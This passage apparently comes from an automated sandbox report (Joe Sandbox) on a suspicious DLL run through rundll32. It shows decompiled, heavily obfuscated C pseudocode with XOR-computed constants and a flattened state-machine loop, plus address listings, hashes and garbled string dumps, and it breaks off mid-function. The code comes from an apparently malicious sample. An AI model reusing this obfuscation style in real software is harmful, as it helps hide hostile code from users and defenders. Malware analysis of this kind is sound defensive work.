                                                                        • Opcode Fuzzy Hash: 7c72271ec2ee9b29a4bd603220aea34a566be452ea304f07fd4abb6d9bc15b99
                                                                        • Instruction Fuzzy Hash: 6B321671508380DFE3A8CF65C98AA4FBBE1FB84754F108A0DE5D9962A0D7B59948CF43
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 95%
                                                                        			E10007E34(intOrPtr __ecx, intOrPtr __edx) {
                                                                        				char _v524;
                                                                        				intOrPtr _v536;
                                                                        				char _v540;
                                                                        				intOrPtr _v544;
                                                                        				signed int _v548;
                                                                        				signed int _v552;
                                                                        				signed int _v556;
                                                                        				signed int _v560;
                                                                        				signed int _v564;
                                                                        				signed int _v568;
                                                                        				signed int _v572;
                                                                        				signed int _v576;
                                                                        				signed int _v580;
                                                                        				signed int _v584;
                                                                        				signed int _v588;
                                                                        				signed int _v592;
                                                                        				unsigned int _v596;
                                                                        				signed int _v600;
                                                                        				signed int _v604;
                                                                        				signed int _v608;
                                                                        				signed int _v612;
                                                                        				signed int _v616;
                                                                        				signed int _v620;
                                                                        				signed int _v624;
                                                                        				signed int _v628;
                                                                        				signed int _v632;
                                                                        				signed int _v636;
                                                                        				signed int _v640;
                                                                        				signed int _v644;
                                                                        				signed int _v648;
                                                                        				signed int _v652;
                                                                        				signed int _v656;
                                                                        				signed int _v660;
                                                                        				signed int _v664;
                                                                        				signed int _v668;
                                                                        				signed int _v672;
                                                                        				signed int _v676;
                                                                        				signed int _v680;
                                                                        				signed int _v684;
                                                                        				signed int _v688;
                                                                        				signed int _v692;
                                                                        				signed int _v696;
                                                                        				signed int _v700;
                                                                        				signed int _v704;
                                                                        				signed int _v708;
                                                                        				signed int _v712;
                                                                        				signed int _v716;
                                                                        				signed int _v720;
                                                                        				signed int _v724;
                                                                        				signed int _v728;
                                                                        				signed int _v732;
                                                                        				void* _t497;
                                                                        				intOrPtr _t500;
                                                                        				intOrPtr _t502;
                                                                        				intOrPtr _t505;
                                                                        				void* _t510;
                                                                        				intOrPtr _t514;
                                                                        				intOrPtr _t516;
                                                                        				intOrPtr _t524;
                                                                        				signed int _t527;
                                                                        				signed int _t528;
                                                                        				signed int _t529;
                                                                        				signed int _t530;
                                                                        				signed int _t531;
                                                                        				signed int _t532;
                                                                        				signed int _t533;
                                                                        				signed int _t534;
                                                                        				signed int _t535;
                                                                        				signed int _t536;
                                                                        				signed int _t537;
                                                                        				signed int _t538;
                                                                        				signed int _t539;
                                                                        				signed int _t540;
                                                                        				void* _t541;
                                                                        				void* _t543;
                                                                        				signed int _t598;
                                                                        				intOrPtr _t599;
                                                                        				signed int _t600;
                                                                        				intOrPtr _t604;
                                                                        				signed int* _t605;
                                                                        				signed int* _t606;
                                                                        				void* _t611;
                                                                        
                                                                        				_t605 =  &_v732;
                                                                        				_v548 = _v548 & 0x00000000;
                                                                        				_v608 = 0x8e77;
                                                                        				_v544 = __edx;
                                                                        				_t604 = __ecx;
                                                                        				_t600 = 0xf92d88;
                                                                        				_t598 = 0x7f;
                                                                        				_v608 = _v608 / _t598;
                                                                        				_v608 = _v608 ^ 0x0200011f;
                                                                        				_v664 = 0x5ee6;
                                                                        				_v664 = _v664 >> 6;
                                                                        				_t527 = 0x74;
                                                                        				_v664 = _v664 * 0x3a;
                                                                        				_v664 = _v664 ^ 0x00004336;
                                                                        				_v724 = 0x97d5;
                                                                        				_v724 = _v724 / _t527;
                                                                        				_v724 = _v724 | 0x73d16624;
                                                                        				_t528 = 0x48;
                                                                        				_v724 = _v724 / _t528;
                                                                        				_v724 = _v724 ^ 0x019bc567;
                                                                        				_v684 = 0xe6c9;
                                                                        				_v684 = _v684 << 4;
                                                                        				_t529 = 0x2a;
                                                                        				_v684 = _v684 / _t529;
                                                                        				_t530 = 0xc;
                                                                        				_v684 = _v684 * 0x45;
                                                                        				_v684 = _v684 ^ 0x0017da0f;
                                                                        				_v596 = 0x84c3;
                                                                        				_v596 = _v596 >> 0xc;
                                                                        				_v596 = _v596 ^ 0x00000094;
                                                                        				_v716 = 0x73cc;
                                                                        				_v716 = _v716 >> 5;
                                                                        				_v716 = _v716 * 0x51;
                                                                        				_v716 = _v716 + 0xffff7ccf;
                                                                        				_v716 = _v716 ^ 0x000099a4;
                                                                        				_v700 = 0xc2fe;
                                                                        				_v700 = _v700 | 0x0147ff89;
                                                                        				_v700 = _v700 >> 2;
                                                                        				_v700 = _v700 + 0xffffed96;
                                                                        				_v700 = _v700 ^ 0x0051cc5f;
                                                                        				_v624 = 0x598b;
                                                                        				_v624 = _v624 * 0x46;
                                                                        				_v624 = _v624 / _t530;
                                                                        				_v624 = _v624 ^ 0x00023e05;
                                                                        				_v560 = 0x1a77;
                                                                        				_v560 = _v560 / _t598;
                                                                        				_v560 = _v560 ^ 0x000017c3;
                                                                        				_v640 = 0x468b;
                                                                        				_v640 = _v640 ^ 0xf8cef0f9;
                                                                        				_v640 = _v640 ^ 0x157598e1;
                                                                        				_v640 = _v640 ^ 0xedbb3f55;
                                                                        				_v660 = 0x95cb;
                                                                        				_v660 = _v660 ^ 0xe0385738;
                                                                        				_t103 =  &_v660; // 0xe0385738
                                                                        				_t531 = 0x34;
                                                                        				_v660 =  *_t103 * 0x38;
                                                                        				_v660 = _v660 ^ 0x0c6ae6d8;
                                                                        				_v692 = 0x21c1;
                                                                        				_v692 = _v692 / _t531;
                                                                        				_t532 = 0x70;
                                                                        				_v692 = _v692 * 0x25;
                                                                        				_v692 = _v692 << 4;
                                                                        				_v692 = _v692 ^ 0x00016ad5;
                                                                        				_v592 = 0xa9db;
                                                                        				_v592 = _v592 ^ 0x5846e700;
                                                                        				_v592 = _v592 ^ 0x584631e9;
                                                                        				_v600 = 0x3eca;
                                                                        				_v600 = _v600 + 0x9bab;
                                                                        				_v600 = _v600 ^ 0x0000ec74;
                                                                        				_v672 = 0x247b;
                                                                        				_v672 = _v672 + 0xffff7cea;
                                                                        				_v672 = _v672 + 0xffff49cc;
                                                                        				_v672 = _v672 ^ 0xfffef3f1;
                                                                        				_v720 = 0x5bb8;
                                                                        				_v720 = _v720 << 5;
                                                                        				_v720 = _v720 << 0xe;
                                                                        				_v720 = _v720 * 0x69;
                                                                        				_v720 = _v720 ^ 0xf3c05410;
                                                                        				_v604 = 0x12e;
                                                                        				_v604 = _v604 ^ 0xcbcc0f39;
                                                                        				_v604 = _v604 ^ 0xcbcc0717;
                                                                        				_v676 = 0x4f1f;
                                                                        				_v676 = _v676 + 0xffffd823;
                                                                        				_v676 = _v676 ^ 0x00001628;
                                                                        				_v668 = 0xa101;
                                                                        				_v668 = _v668 / _t532;
                                                                        				_v668 = _v668 << 7;
                                                                        				_v668 = _v668 ^ 0x0000d0e8;
                                                                        				_v712 = 0xf562;
                                                                        				_v712 = _v712 + 0xe29d;
                                                                        				_v712 = _v712 | 0xaf029352;
                                                                        				_t533 = 0x2c;
                                                                        				_v712 = _v712 / _t533;
                                                                        				_v712 = _v712 ^ 0x03fa2878;
                                                                        				_v584 = 0xa7c6;
                                                                        				_v584 = _v584 ^ 0x2308cfbe;
                                                                        				_v584 = _v584 ^ 0x23086838;
                                                                        				_v696 = 0xba3e;
                                                                        				_v696 = _v696 << 9;
                                                                        				_v696 = _v696 ^ 0x7a641ee8;
                                                                        				_v696 = _v696 >> 2;
                                                                        				_v696 = _v696 ^ 0x1ec44f4b;
                                                                        				_v568 = 0x7d1;
                                                                        				_v568 = _v568 << 2;
                                                                        				_v568 = _v568 ^ 0x00007750;
                                                                        				_v704 = 0x3590;
                                                                        				_v704 = _v704 * 0x4c;
                                                                        				_v704 = _v704 << 2;
                                                                        				_v704 = _v704 << 8;
                                                                        				_v704 = _v704 ^ 0x3f9b76a0;
                                                                        				_v576 = 0x6e4c;
                                                                        				_v576 = _v576 << 8;
                                                                        				_v576 = _v576 ^ 0x006e4c78;
                                                                        				_v636 = 0xe1b3;
                                                                        				_t534 = 0x38;
                                                                        				_v636 = _v636 / _t534;
                                                                        				_v636 = _v636 | 0xbc23d7c2;
                                                                        				_v636 = _v636 ^ 0xbc23f6d4;
                                                                        				_v644 = 0xc193;
                                                                        				_v644 = _v644 + 0xffffe081;
                                                                        				_v644 = _v644 | 0xe7ea23f6;
                                                                        				_v644 = _v644 ^ 0xe7eab5c6;
                                                                        				_v652 = 0xff18;
                                                                        				_v652 = _v652 ^ 0x15e6b590;
                                                                        				_v652 = _v652 | 0x9145bae2;
                                                                        				_v652 = _v652 ^ 0x95e7a511;
                                                                        				_v688 = 0x91dc;
                                                                        				_v688 = _v688 << 0xf;
                                                                        				_v688 = _v688 + 0xffffec69;
                                                                        				_v688 = _v688 + 0x152;
                                                                        				_v688 = _v688 ^ 0x48ede9e6;
                                                                        				_v588 = 0xda26;
                                                                        				_t535 = 0x43;
                                                                        				_v588 = _v588 / _t535;
                                                                        				_v588 = _v588 ^ 0x00003ef3;
                                                                        				_v728 = 0x13e1;
                                                                        				_v728 = _v728 << 5;
                                                                        				_v728 = _v728 | 0x81597e77;
                                                                        				_t536 = 0x67;
                                                                        				_v728 = _v728 / _t536;
                                                                        				_v728 = _v728 ^ 0x0141a54f;
                                                                        				_v732 = 0xfe77;
                                                                        				_v732 = _v732 ^ 0xa2bc77b9;
                                                                        				_v732 = _v732 << 0xb;
                                                                        				_t537 = 0x3d;
                                                                        				_v732 = _v732 * 0x1f;
                                                                        				_v732 = _v732 ^ 0xa57fc270;
                                                                        				_v564 = 0xd716;
                                                                        				_v564 = _v564 ^ 0x4072510d;
                                                                        				_v564 = _v564 ^ 0x40729e8d;
                                                                        				_v708 = 0xf6c2;
                                                                        				_v708 = _v708 + 0xffff713e;
                                                                        				_v708 = _v708 * 0xe;
                                                                        				_v708 = _v708 / _t537;
                                                                        				_v708 = _v708 ^ 0x00002963;
                                                                        				_v580 = 0x83ac;
                                                                        				_t538 = 0x4a;
                                                                        				_v580 = _v580 / _t538;
                                                                        				_v580 = _v580 ^ 0x000067e0;
                                                                        				_v632 = 0xd307;
                                                                        				_v632 = _v632 >> 0xb;
                                                                        				_v632 = _v632 ^ 0x73d3f358;
                                                                        				_v632 = _v632 ^ 0x73d3bdee;
                                                                        				_v656 = 0x12d9;
                                                                        				_v656 = _v656 | 0x78eb2603;
                                                                        				_v656 = _v656 + 0xffffb5b9;
                                                                        				_v656 = _v656 ^ 0x78eaf389;
                                                                        				_v552 = 0x5776;
                                                                        				_v552 = _v552 + 0x2f24;
                                                                        				_v552 = _v552 ^ 0x00009a22;
                                                                        				_v616 = 0x2c00;
                                                                        				_v616 = _v616 + 0x792b;
                                                                        				_v616 = _v616 + 0xffffa094;
                                                                        				_v616 = _v616 ^ 0x00000aad;
                                                                        				_v572 = 0x3f59;
                                                                        				_v572 = _v572 | 0xe3450093;
                                                                        				_v572 = _v572 ^ 0xe3451fd2;
                                                                        				_v556 = 0x6ea6;
                                                                        				_t539 = 0x1d;
                                                                        				_t524 = _v544;
                                                                        				_v556 = _v556 * 0x56;
                                                                        				_v556 = _v556 ^ 0x002547d9;
                                                                        				_v648 = 0xf811;
                                                                        				_v648 = _v648 << 8;
                                                                        				_v648 = _v648 ^ 0xcc5c85c7;
                                                                        				_v648 = _v648 ^ 0xcca4883c;
                                                                        				_v612 = 0xcfc1;
                                                                        				_t599 = _v544;
                                                                        				_v612 = _v612 * 0x33;
                                                                        				_v612 = _v612 >> 1;
                                                                        				_v612 = _v612 ^ 0x0014c5bf;
                                                                        				_v620 = 0x3b04;
                                                                        				_v620 = _v620 >> 3;
                                                                        				_v620 = _v620 ^ 0x957054e4;
                                                                        				_v620 = _v620 ^ 0x95705ef6;
                                                                        				_v628 = 0x17ec;
                                                                        				_v628 = _v628 / _t539;
                                                                        				_v628 = _v628 + 0xffffc55c;
                                                                        				_v628 = _v628 ^ 0xffffc912;
                                                                        				_v680 = 0x1f47;
                                                                        				_v680 = _v680 | 0x8760986b;
                                                                        				_t540 = 0x6b;
                                                                        				_v680 = _v680 / _t540;
                                                                        				_v680 = _v680 + 0xeba5;
                                                                        				_v680 = _v680 ^ 0x0144ccb9;
                                                                        				while(1) {
                                                                        					L1:
                                                                        					_t497 = 0x22698256;
                                                                        					while(1) {
                                                                        						L2:
                                                                        						_t541 = 0x37da4205;
                                                                        						do {
                                                                        							while(1) {
                                                                        								L3:
                                                                        								_t611 = _t600 - 0x1571d90b;
                                                                        								if(_t611 > 0) {
                                                                        									break;
                                                                        								}
                                                                        								if(_t611 == 0) {
                                                                        									_t510 = E1000934C(_t541);
                                                                        									__eflags = _t510 - E10014DBD();
                                                                        									_t497 = 0x22698256;
                                                                        									_t600 = 0x695d68;
                                                                        									_t524 =  !=  ? 0x22698256 : 0xbd09969;
                                                                        									while(1) {
                                                                        										L2:
                                                                        										_t541 = 0x37da4205;
                                                                        										goto L3;
                                                                        									}
                                                                        								}
                                                                        								if(_t600 == 0x695d68) {
                                                                        									__eflags = _t524 - _t497;
                                                                        									if(_t524 != _t497) {
                                                                        										_t600 = 0xd0bbcc0;
                                                                        										continue;
                                                                        									} else {
                                                                        										_push(_v608);
                                                                        										E10004BDE(_v716, _v700,  &_v548, _v624, _t541);
                                                                        										_t605 =  &(_t605[5]);
                                                                        										asm("sbb esi, esi");
                                                                        										_t600 = (_t600 & 0xff859553) + 0xd86276d;
                                                                        										while(1) {
                                                                        											L1:
                                                                        											_t497 = 0x22698256;
                                                                        											L2:
                                                                        											_t541 = 0x37da4205;
                                                                        											goto L3;
                                                                        										}
                                                                        									}
                                                                        									L34:
                                                                        								}
                                                                        								if(_t600 != 0xf92d88) {
                                                                        									if(_t600 == 0xd0bbcc0) {
                                                                        										_push( &_v524);
                                                                        										_push(0x10001318);
                                                                        										_t516 = E10002628(_t604, _v544);
                                                                        										__eflags = _t516;
                                                                        										_t497 = 0x22698256;
                                                                        										if(_t516 == 0) {
                                                                        											__eflags = _t524 - 0x22698256;
                                                                        											if(_t524 == 0x22698256) {
                                                                        												E100078F0(_v548, _v560, _v640, _v660, _v692);
                                                                        												_t605 =  &(_t605[3]);
                                                                        												_t497 = 0x22698256;
                                                                        											}
                                                                        											_t600 = 0xd86276d;
                                                                        											goto L2;
                                                                        										} else {
                                                                        											__eflags = _t524 - 0x22698256;
                                                                        											_t541 = 0x37da4205;
                                                                        											_t600 =  ==  ? 0x37da4205 : 0x39310db5;
                                                                        											continue;
                                                                        										}
                                                                        									} else {
                                                                        										if(_t600 == 0xd86276d) {
                                                                        											return E100091CD(_v612, _v620, _v628, _t599, _v680);
                                                                        										}
                                                                        										goto L30;
                                                                        									}
                                                                        								}
                                                                        								_push(_t541);
                                                                        								_t543 = 0x24;
                                                                        								_t514 = E100157E8(_t543);
                                                                        								_t599 = _t514;
                                                                        								__eflags = _t599;
                                                                        								if(_t599 != 0) {
                                                                        									_t600 = 0x1571d90b;
                                                                        									while(1) {
                                                                        										L1:
                                                                        										_t497 = 0x22698256;
                                                                        										goto L2;
                                                                        									}
                                                                        								}
                                                                        								return _t514;
                                                                        								goto L34;
                                                                        							}
                                                                        							__eflags = _t600 - _t541;
                                                                        							if(_t600 == _t541) {
                                                                        								_t500 = E1001D530(_v592,  &_v524, _v600, _v672,  &_v540, _v720, _v548, _v604);
                                                                        								_t606 =  &(_t605[8]);
                                                                        								__eflags = _t500;
                                                                        								if(_t500 != 0) {
                                                                        									E100078F0(_v540, _v676, _v668, _v712, _v584);
                                                                        									E100078F0(_v536, _v696, _v568, _v704, _v576);
                                                                        									_t606 =  &(_t606[6]);
                                                                        								}
                                                                        								E100078F0(_v548, _v636, _v644, _v652, _v688);
                                                                        								_t605 =  &(_t606[3]);
                                                                        								_t600 = 0x38dc6618;
                                                                        								_t497 = 0x22698256;
                                                                        								_t541 = 0x37da4205;
                                                                        								goto L30;
                                                                        							} else {
                                                                        								__eflags = _t600 - 0x38dc6618;
                                                                        								if(_t600 == 0x38dc6618) {
                                                                        									 *((intOrPtr*)(_t599 + 0x20)) = _t604;
                                                                        									_t502 =  *0x10021400; // 0x0
                                                                        									 *((intOrPtr*)(_t599 + 0x10)) = _t502;
                                                                        									 *0x10021400 = _t599;
                                                                        									return _t502;
                                                                        								}
                                                                        								__eflags = _t600 - 0x39310db5;
                                                                        								if(__eflags != 0) {
                                                                        									goto L30;
                                                                        								} else {
                                                                        									_push(_v708);
                                                                        									_push(0);
                                                                        									_push(0);
                                                                        									_push(_t541);
                                                                        									_push(_v564);
                                                                        									_push(_v732);
                                                                        									_push( &_v524);
                                                                        									_push( &_v540);
                                                                        									_t505 = E100189F6(_v588, _v728, __eflags);
                                                                        									_t605 =  &(_t605[8]);
                                                                        									__eflags = _t505;
                                                                        									if(_t505 != 0) {
                                                                        										E100078F0(_v540, _v580, _v632, _v656, _v552);
                                                                        										E100078F0(_v536, _v616, _v572, _v556, _v648);
                                                                        										_t605 =  &(_t605[6]);
                                                                        									}
                                                                        									_t600 = 0x38dc6618;
                                                                        									goto L1;
                                                                        								}
                                                                        							}
                                                                        							goto L34;
                                                                        							L30:
                                                                        							__eflags = _t600 - 0x2870efef;
                                                                        						} while (_t600 != 0x2870efef);
                                                                        						return _t497;
                                                                        					}
                                                                        				}
                                                                        			}

                                                                        0x100081ac
                                                                        0x100081b1
                                                                        0x100081b6
                                                                        0x100081be
                                                                        0x100081c9
                                                                        0x100081d1
                                                                        0x100081dc
                                                                        0x100081ec
                                                                        0x100081f1
                                                                        0x100081f7
                                                                        0x100081ff
                                                                        0x10008207
                                                                        0x1000820f
                                                                        0x10008217
                                                                        0x1000821f
                                                                        0x10008227
                                                                        0x1000822f
                                                                        0x10008237
                                                                        0x1000823f
                                                                        0x10008247
                                                                        0x1000824f
                                                                        0x10008254
                                                                        0x1000825c
                                                                        0x10008264
                                                                        0x1000826c
                                                                        0x1000827e
                                                                        0x10008283
                                                                        0x1000828c
                                                                        0x10008297
                                                                        0x1000829f
                                                                        0x100082a4
                                                                        0x100082b0
                                                                        0x100082b5
                                                                        0x100082bb
                                                                        0x100082c3
                                                                        0x100082cb
                                                                        0x100082d3
                                                                        0x100082dd
                                                                        0x100082e0
                                                                        0x100082e4
                                                                        0x100082ec
                                                                        0x100082f7
                                                                        0x10008302
                                                                        0x1000830d
                                                                        0x10008315
                                                                        0x10008322
                                                                        0x1000832e
                                                                        0x10008332
                                                                        0x1000833a
                                                                        0x1000834c
                                                                        0x1000834f
                                                                        0x10008356
                                                                        0x10008361
                                                                        0x10008369
                                                                        0x1000836e
                                                                        0x10008376
                                                                        0x1000837e
                                                                        0x10008386
                                                                        0x1000838e
                                                                        0x10008396
                                                                        0x1000839e
                                                                        0x100083a9
                                                                        0x100083b4
                                                                        0x100083bf
                                                                        0x100083ca
                                                                        0x100083d5
                                                                        0x100083e0
                                                                        0x100083eb
                                                                        0x100083f8
                                                                        0x10008403
                                                                        0x1000840e
                                                                        0x10008423
                                                                        0x10008426
                                                                        0x1000842d
                                                                        0x10008434
                                                                        0x1000843f
                                                                        0x10008447
                                                                        0x1000844c
                                                                        0x10008454
                                                                        0x1000845c
                                                                        0x1000846f
                                                                        0x10008476
                                                                        0x1000847d
                                                                        0x10008484
                                                                        0x1000848f
                                                                        0x1000849a
                                                                        0x100084a2
                                                                        0x100084ad
                                                                        0x100084b8
                                                                        0x100084c8
                                                                        0x100084cc
                                                                        0x100084d4
                                                                        0x100084dc
                                                                        0x100084e4
                                                                        0x100084f0
                                                                        0x100084f3
                                                                        0x100084f7
                                                                        0x100084ff
                                                                        0x10008507
                                                                        0x10008507
                                                                        0x10008507
                                                                        0x1000850c
                                                                        0x1000850c
                                                                        0x1000850c
                                                                        0x10008511
                                                                        0x10008511
                                                                        0x10008511
                                                                        0x10008511
                                                                        0x10008517
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000851d
                                                                        0x10008660
                                                                        0x1000866c
                                                                        0x10008673
                                                                        0x10008678
                                                                        0x1000867d
                                                                        0x1000850c
                                                                        0x1000850c
                                                                        0x1000850c
                                                                        0x00000000
                                                                        0x1000850c
                                                                        0x1000850c
                                                                        0x10008529
                                                                        0x1000860b
                                                                        0x1000860d
                                                                        0x1000864b
                                                                        0x00000000
                                                                        0x1000860f
                                                                        0x1000860f
                                                                        0x1000862e
                                                                        0x10008633
                                                                        0x10008638
                                                                        0x10008640
                                                                        0x10008507
                                                                        0x10008507
                                                                        0x10008507
                                                                        0x1000850c
                                                                        0x1000850c
                                                                        0x00000000
                                                                        0x1000850c
                                                                        0x10008507
                                                                        0x00000000
                                                                        0x1000860d
                                                                        0x10008535
                                                                        0x10008541
                                                                        0x10008584
                                                                        0x10008585
                                                                        0x1000858c
                                                                        0x10008592
                                                                        0x10008594
                                                                        0x1000859a
                                                                        0x100085b0
                                                                        0x100085b2
                                                                        0x100085ce
                                                                        0x100085d3
                                                                        0x100085d6
                                                                        0x100085d6
                                                                        0x100085db
                                                                        0x00000000
                                                                        0x1000859c
                                                                        0x1000859c
                                                                        0x100085a3
                                                                        0x100085a8
                                                                        0x00000000
                                                                        0x100085a8
                                                                        0x10008543
                                                                        0x10008549
                                                                        0x00000000
                                                                        0x1000856e
                                                                        0x00000000
                                                                        0x10008549
                                                                        0x10008541
                                                                        0x100085ed
                                                                        0x100085f0
                                                                        0x100085f1
                                                                        0x100085f6
                                                                        0x100085f9
                                                                        0x100085fb
                                                                        0x10008601
                                                                        0x10008507
                                                                        0x10008507
                                                                        0x10008507
                                                                        0x00000000
                                                                        0x10008507
                                                                        0x10008507
                                                                        0x10008815
                                                                        0x00000000
                                                                        0x10008815
                                                                        0x10008685
                                                                        0x10008687
                                                                        0x1000876b
                                                                        0x10008770
                                                                        0x10008773
                                                                        0x10008775
                                                                        0x10008791
                                                                        0x100087b6
                                                                        0x100087bb
                                                                        0x100087bb
                                                                        0x100087d5
                                                                        0x100087da
                                                                        0x100087dd
                                                                        0x100087e2
                                                                        0x100087e7
                                                                        0x00000000
                                                                        0x1000868d
                                                                        0x1000868d
                                                                        0x10008693
                                                                        0x100087fa
                                                                        0x100087fd
                                                                        0x10008802
                                                                        0x10008805
                                                                        0x00000000
                                                                        0x10008805
                                                                        0x10008699
                                                                        0x1000869f
                                                                        0x00000000
                                                                        0x100086a5
                                                                        0x100086a5
                                                                        0x100086b0
                                                                        0x100086b2
                                                                        0x100086b4
                                                                        0x100086b5
                                                                        0x100086bc
                                                                        0x100086cb
                                                                        0x100086d3
                                                                        0x100086d4
                                                                        0x100086d9
                                                                        0x100086dc
                                                                        0x100086de
                                                                        0x100086fd
                                                                        0x10008725
                                                                        0x1000872a
                                                                        0x1000872a
                                                                        0x1000872d
                                                                        0x00000000
                                                                        0x1000872d
                                                                        0x1000869f
                                                                        0x00000000
                                                                        0x100087ec
                                                                        0x100087ec
                                                                        0x100087ec
                                                                        0x00000000
                                                                        0x10008511
                                                                        0x1000850c

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Qr@$$/$+y$8W8$Pw$Y?$c)$h]i$h]i$t$xLn${$$1FX$^$g$p($H
                                                                        • API String ID: 0-1563294895
                                                                        • Opcode ID: 171111c34be3d9b94ac95fd15d466b49e40bc1f9e22da6f9989ed6422f849ba4
                                                                        • Instruction ID: f7445f3b1b55f540d70f1e3b73910c5f00ddc209463d1ebaed6bac0f40c33f80
                                                                        • Opcode Fuzzy Hash: 171111c34be3d9b94ac95fd15d466b49e40bc1f9e22da6f9989ed6422f849ba4
                                                                        • Instruction Fuzzy Hash: 0F32117250C3818FE368CF25C949A8BBBE1FBC5748F10891DE6D9962A0D7B59909CF43
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 96%
                                                                        			E1001F411() {
                                                                        				char _v520;
                                                                        				char _v1040;
                                                                        				char _v1560;
                                                                        				signed int _v1564;
                                                                        				intOrPtr _v1568;
                                                                        				char _v1572;
                                                                        				signed int _v1576;
                                                                        				signed int _v1580;
                                                                        				signed int _v1584;
                                                                        				signed int _v1588;
                                                                        				signed int _v1592;
                                                                        				signed int _v1596;
                                                                        				signed int _v1600;
                                                                        				signed int _v1604;
                                                                        				signed int _v1608;
                                                                        				signed int _v1612;
                                                                        				signed int _v1616;
                                                                        				signed int _v1620;
                                                                        				signed int _v1624;
                                                                        				signed int _v1628;
                                                                        				signed int _v1632;
                                                                        				signed int _v1636;
                                                                        				signed int _v1640;
                                                                        				signed int _v1644;
                                                                        				signed int _v1648;
                                                                        				unsigned int _v1652;
                                                                        				signed int _v1656;
                                                                        				signed int _v1660;
                                                                        				signed int _v1664;
                                                                        				signed int _v1668;
                                                                        				signed int _v1672;
                                                                        				signed int _v1676;
                                                                        				signed int _v1680;
                                                                        				signed int _v1684;
                                                                        				signed int _v1688;
                                                                        				signed int _v1692;
                                                                        				signed int _v1696;
                                                                        				signed int _v1700;
                                                                        				signed int _v1704;
                                                                        				signed int _v1708;
                                                                        				signed int _v1712;
                                                                        				signed int _v1716;
                                                                        				signed int _v1720;
                                                                        				signed int _v1724;
                                                                        				signed int _v1728;
                                                                        				signed int _v1732;
                                                                        				signed int _v1736;
                                                                        				signed int _v1740;
                                                                        				signed int _v1744;
                                                                        				signed int _v1748;
                                                                        				signed int _v1752;
                                                                        				signed int _v1756;
                                                                        				signed int _v1760;
                                                                        				signed int _v1764;
                                                                        				void* _t493;
                                                                        				signed int _t495;
                                                                        				signed int _t497;
                                                                        				void* _t499;
                                                                        				void* _t505;
                                                                        				signed int _t516;
                                                                        				signed int _t518;
                                                                        				signed int _t519;
                                                                        				signed int _t520;
                                                                        				signed int _t521;
                                                                        				signed int _t522;
                                                                        				signed int _t523;
                                                                        				signed int _t524;
                                                                        				signed int _t525;
                                                                        				signed int _t526;
                                                                        				signed int _t527;
                                                                        				signed int _t528;
                                                                        				signed int _t529;
                                                                        				void* _t530;
                                                                        				void* _t533;
                                                                        				void* _t539;
                                                                        				void* _t581;
                                                                        				signed int* _t586;
                                                                        
                                                                        				_t586 =  &_v1764;
                                                                        				_v1568 = 0x6bc4b7;
                                                                        				_v1564 = 0;
                                                                        				_v1616 = 0x7b31;
                                                                        				_v1616 = _v1616 >> 5;
                                                                        				_v1616 = _v1616 ^ 0x000003f0;
                                                                        				_v1636 = 0x8aee;
                                                                        				_v1636 = _v1636 << 6;
                                                                        				_v1636 = _v1636 ^ 0xb9ff3183;
                                                                        				_v1636 = _v1636 ^ 0x39dd8a02;
                                                                        				_v1756 = 0x620;
                                                                        				_v1756 = _v1756 | 0x6d559036;
                                                                        				_v1756 = _v1756 << 8;
                                                                        				_v1576 = 0;
                                                                        				_t581 = 0x3875c21b;
                                                                        				_t519 = 0x48;
                                                                        				_v1756 = _v1756 / _t519;
                                                                        				_v1756 = _v1756 ^ 0x01304efa;
                                                                        				_v1684 = 0x5cfd;
                                                                        				_t520 = 0x36;
                                                                        				_v1684 = _v1684 * 0x52;
                                                                        				_v1684 = _v1684 * 0x24;
                                                                        				_v1684 = _v1684 ^ 0x04302f49;
                                                                        				_v1628 = 0x396e;
                                                                        				_v1628 = _v1628 * 0x28;
                                                                        				_v1628 = _v1628 ^ 0x0008c3d7;
                                                                        				_v1696 = 0x5408;
                                                                        				_v1696 = _v1696 >> 0xc;
                                                                        				_v1696 = _v1696 << 0xe;
                                                                        				_v1696 = _v1696 << 1;
                                                                        				_v1696 = _v1696 ^ 0x0002db53;
                                                                        				_v1760 = 0x3df4;
                                                                        				_v1760 = _v1760 * 0x61;
                                                                        				_v1760 = _v1760 << 5;
                                                                        				_v1760 = _v1760 / _t520;
                                                                        				_v1760 = _v1760 ^ 0x000da470;
                                                                        				_v1588 = 0x721a;
                                                                        				_t521 = 0x47;
                                                                        				_v1588 = _v1588 / _t521;
                                                                        				_v1588 = _v1588 ^ 0x0000070f;
                                                                        				_v1752 = 0x8c93;
                                                                        				_v1752 = _v1752 << 0xa;
                                                                        				_v1752 = _v1752 << 0xb;
                                                                        				_v1752 = _v1752 | 0xe01a6e70;
                                                                        				_v1752 = _v1752 ^ 0xf27a671c;
                                                                        				_v1644 = 0xefc8;
                                                                        				_t522 = 0x6d;
                                                                        				_v1644 = _v1644 / _t522;
                                                                        				_v1644 = _v1644 ^ 0x739099de;
                                                                        				_v1644 = _v1644 ^ 0x7390cdd9;
                                                                        				_v1596 = 0x1ffd;
                                                                        				_v1596 = _v1596 ^ 0x86e06afb;
                                                                        				_v1596 = _v1596 ^ 0x86e015b5;
                                                                        				_v1652 = 0xc429;
                                                                        				_v1652 = _v1652 >> 0xf;
                                                                        				_v1652 = _v1652 >> 6;
                                                                        				_v1652 = _v1652 ^ 0x00006789;
                                                                        				_v1600 = 0x57b4;
                                                                        				_t523 = 0x7f;
                                                                        				_v1600 = _v1600 / _t523;
                                                                        				_v1600 = _v1600 ^ 0x00007042;
                                                                        				_v1744 = 0xf601;
                                                                        				_t524 = 0x2d;
                                                                        				_v1744 = _v1744 * 0x77;
                                                                        				_v1744 = _v1744 * 0x2a;
                                                                        				_v1744 = _v1744 * 0x2c;
                                                                        				_v1744 = _v1744 ^ 0x397d78f9;
                                                                        				_v1592 = 0x85ab;
                                                                        				_v1592 = _v1592 << 4;
                                                                        				_v1592 = _v1592 ^ 0x00082bb5;
                                                                        				_v1720 = 0xd613;
                                                                        				_v1720 = _v1720 + 0x2992;
                                                                        				_v1720 = _v1720 << 1;
